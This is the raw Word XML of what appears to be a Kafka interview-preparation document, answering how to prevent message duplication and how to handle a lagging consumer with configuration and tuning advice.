          <v:rect id="_x0000_i3471" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14747D2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3F1F9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handle message duplication in Kafka effectively, you can rely on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050986B2"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for end-to-end guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5980FDE1"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message duplication during retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449888D0"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xml:space="preserve"> to ensure messages are not reprocessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC578DE"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or retaining only the latest version of a message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BAA64D"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level deduplication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using unique identifiers or caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378AC704"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stream processing applications with built-in deduplication mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201C5C9"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oosing the right strategy depends on your use case and the specific requirements for message delivery guarantees in your system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32443F90" w14:textId="23674B6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472" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F473AE5" w14:textId="6904F7A6"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64" w:name="_Toc197868078"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Discuss the techniques to prevent message duplication in Kafka and how idempotence and exactly-once semantics help with this</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="864"/>
    </w:p>
    <w:p w14:paraId="21F12D4B" w14:textId="3294E9C1" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872"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but other methods, such as consumer offset management and log compaction, can also play important roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C636A9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re’s a detailed discussion of the techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFDF71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mpotent Producer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FD9A2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network failures or retries), it will be written only once to the Kafka topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0EBD3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297E40B9"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is achieved by tracking message delivery using a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer ID</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sequence number</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each message. Kafka guarantees that even if a producer retries a message due to temporary issues, the message will not be written to the log more than once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B85CD33"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automatically ensures that the same message (with the same producer ID and sequence number) is not written more than once to the partition, even if there are retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071E0F1F"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2736D9D3" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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This configuration enables idempotent producers, ensuring that the Kafka producer writes each message only once, even in the case of retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4F4B0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42FDD0B7" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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on the producer side</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This ensures that messages are not duplicated due to retries, thereby avoiding potential data inconsistencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3CC47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Exactly-Once Semantics (EOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4AB83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is a more advanced feature in Kafka that guarantees messages are neither lost nor duplicated throughout the entire Kafka pipeline (from producer to consumer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798AEB4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6170EAF1"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For EOS to work, the producer must be </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and must use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. By assigning a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transactional ID</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to each producer, Kafka tracks messages sent as part of a transaction, ensuring that they are committed or rolled back as a unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F20BF9"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Consumers track offsets manually and ensure that they don't reprocess a message. Kafka keeps track of what messages a consumer has processed and guarantees that each message is processed exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C222E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2DC2C546"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2416ECD7"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at the producer waits for acknowledgment from all replicas before considering the message sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E88C8DA"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to ensure that messages are delivered exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E1762"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Ensures that even in case of retries, no message is delivered more than once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6623C951"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05EF038B"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This disables auto-commit of offsets, allowing manual control over when an offset is committed, thereby preventing reprocessing of messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67A5A4"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ffset management and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ensure that messages are only processed once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A5C9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D003A5"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across the entire pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: From production to consumption, the message is ensured to be processed exactly once. This guarantees consistency even in the case of failures or retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5628C082"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itical for stateful processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In use cases where stateful stream processing is performed (e.g., aggregations or joins), exactly-once semantics ensures that intermediate results are correct and consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E26D2"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40D44033"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duplication can occur if a consumer reprocesses messages it has already consumed. To avoid this, consumers need to manage their offsets carefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFA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3750CDC"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xml:space="preserve">: By disabling </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auto-commit</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of offsets (i.e., enable.auto.commit=false), consumers can manually commit offsets only after successfully processing the messages. This ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>if a consumer crashes, it can resume from the last successfully processed message rather than reprocessing messages that have already been consumed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B24EB"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externally</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In some cases, offsets are stored outside Kafka (e.g., in a database) to maintain more control over when and how offsets are committed, further ensuring accurate tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4432C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725CA2E1" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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reprocessing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manual offset management guarantees that consumers do not process the same message more than once, even if the consumer crashes or restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E1807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Log Compaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740ADA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eature helps with deduplication, especially when only the most recent version of a message is important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D6F5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045431FF"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In cases where multiple updates to the same key are sent (e.g., updating a user’s information), Kafka will retain only the last value for that key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE6AA7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E255B02" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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cleanup.policy=compact in the topic configuration. This ensures that Kafka keeps only the latest message for each key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21512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329DD4" w14:textId="77777777" w:rsidR="00E62872" w:rsidRPr="004269A3" w:rsidRDefault="00E62872" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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duces duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For use cases where you care about the latest value of a key, log compaction ensures that the log doesn’t grow unnecessarily large with older versions of the same key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDDC0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Deduplication at Consumer Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392943F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cenarios where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re not feasible or required, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deduplication at the consumer level</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help prevent the processing of duplicate messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F20491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14A00D2F"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e.g., in memory or in an external database) to track which messages have already been processed based on unique identifiers (such as message keys or custom IDs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B268F3A"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processing a new message, the consumer checks the cache to ensure that it has not already processed the message. If the message is in the cache, it is skipped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7151850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F693907"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lexible</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumers have full control over the deduplication process and can handle it according to specific business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDB980"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n be used in combination</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with other deduplication methods (e.g., idempotence or log compaction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23825C4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Producer Message Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1B2EDD"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uses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to determine which partition a message will be written to. If you use the same key for related messages, they will always go to the same partition, which helps maintain message order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE1C6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C76CA0B"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y using a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consistent keying strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ey-based deduplication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By tracking the messages using the key, consumers can identify and skip messages that have already been processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771692E8"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8E3A0">
          <v:rect id="_x0000_i3473" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="380EB58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Techniques to Prevent Message Duplication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275707F0"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Guarantees that messages are not written more than once, even in case of retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D83A6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Guarantees end-to-end message processing without duplication across producers, brokers, and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1244A449"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Prevents consumers from reprocessing messages by manually committing offsets after successful processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F4076"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Ensures that only the latest version of a key’s message is retained in Kafka, which is useful for scenarios where only the most recent state matters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5738D4B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duplication at Consumer Level</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumers can cache and track unique identifiers to avoid processing the same message multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4484CF"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Message Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures related messages are sent to the same partition, which helps in maintaining message order and simplifying deduplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A7D25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474" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B25360B" w14:textId="74597E9C"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65" w:name="_Toc197868079"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What would you do if a Kafka consumer is lagging behind</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="865"/>
    </w:p>
    <w:p w14:paraId="27DF2F12" w14:textId="62F52DAB" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A720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Check Consumer Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF081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Tools for checking consumer lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4909FE65"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use the kafka-consumer-groups.sh command to check the consumer lag. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F713199"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54888A4E"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display the lag (difference between the consumer’s offset and the latest offset) for each partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152EB65E"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Us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to monitor consumer lag continuously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C16FA6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ncrease Consumer Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58923656"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is lagging because it cannot process messages fast enough, you can try the following methods to increase its throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B5C0D"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Consumer Parallelism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C47649F"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the number of partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the consumer group has fewer consumers than partitions, increasing the number of partitions can help distribute the load more effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB05D8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Consumer Processing Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18007788"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fficient Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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nstead of processing each message individually, consider processing messages in batches. This can significantly reduce the overhead and increase throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3796AC"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Increase Consumer Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9C2C0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consumer might be lagging due to resource constraints like CPU, memory, or network bandwidth. In such cases, you can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1152302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up the Consumer Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increase the resources (CPU, memory) allocated to the consumer instance to handle more processing power.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E550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More Powerful Hardware</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Run the consumer on more powerful hardware or in a cloud environment with better resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E1005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Tune Kafka Consumer Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D669FD"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tweak several Kafka consumer configuration parameters to improve the performance of the consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ACCFB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the fetch.min.bytes and fetch.max.bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9CA9E" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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se parameters control the amount of data the consumer fetches in a single request. Increasing these values can help the consumer fetch more data at once, reducing the number of fetch requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CEE425"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the max.poll.records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471323A0" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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controls how many records the consumer retrieves per poll. Increasing it can help in processing more messages in each poll, reducing lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444A963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session.timeout.ms and heartbeat.interval.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C712400" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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ese values are properly set to prevent consumers from being considered dead and rebalance too frequently, which can add overhead and delay message processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7F0F6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djust max.poll.interval.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747EE8E9" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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takes longer to process messages, you may want to increase this value to prevent consumer group rebalancing due to slow processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BA3492"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5. Use Kafka Consumer Groups Effectively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597F9DAE"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void Under-Partitioned Topics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that the number of partitions in your topic is sufficient to handle the load. A topic with too few partitions and many consumers can lead to inefficient parallelism, contributing to lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCCCA4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nsure the Consumer Is Not Throttled by Network or Disk I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14791AC1"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Ensure that network bandwidth is not a bottleneck. Kafka consumers can sometimes lag due to insufficient network throughput between the consumer and the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0504157D"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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the consumer is writing the data to disk (e.g., for local storage or database writes), ensure that the disk throughput is not a limiting factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B918C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pgrade Kafka or Consumer Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF959BF" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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8. Check for Broker or Consumer Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC62B2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times, consumer lag is caused by issues with brokers or consumers. Check the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F72B8EE"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Health</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
